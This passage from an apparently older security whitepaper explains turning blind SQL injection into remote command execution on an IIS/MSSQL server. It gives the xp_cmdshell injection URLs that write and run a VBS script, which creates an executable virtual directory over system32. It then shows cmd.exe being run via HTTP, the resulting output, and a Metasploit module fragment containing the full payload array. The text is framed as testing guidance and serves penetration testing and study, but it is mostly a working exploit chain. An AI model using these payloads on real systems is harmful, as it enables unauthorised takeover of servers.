  • 3. 3 Blueinfy’s whitepaper series on the server. Here is a way by which we can create file line by line and then execute script on the target machine as well. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. ….. ….. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:secret.vbs’ Step 2: Run this file using xp_cmdshell by following command. http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’ This will run file and create /secret/ virtual root on the server. Step 3: Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set Now we have full access to system32 binaries with execution privileges. Here what you get as output. CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:Documents and SettingsAll Users CommonProgramFiles=C:Program FilesCommon Files COMPUTERNAME=BLUESQUARE ComSpec=C:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTPS=off HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=keep-alive HTTP_HOST=localhost HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP_KEEP_ALIVE=300 INCLUDE=C:Program FilesMicrosoft Visual Studio .NETFrameworkSDKinclude INSTANCE_ID=1 LIB=C:Program FilesMicrosoft Visual Studio .NETFrameworkSDKLib LOCAL_ADDR=127.0.0.1 NUMBER_OF_PROCES
  • 4. 4 Blueinfy’s whitepaper series It is possible to integrate into any of the exploit framework as well. For example here is we are putting it into Metasploit: sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) .. .. Once we execute it we get following sort of output. Conclusion: The technique described in this paper can help in testing blind SQL injection running with blind xp_cmdshell. It is easy to send few requests and check whether we are getting execution rights on the target application or not, even application is totally blind as described in problem domain.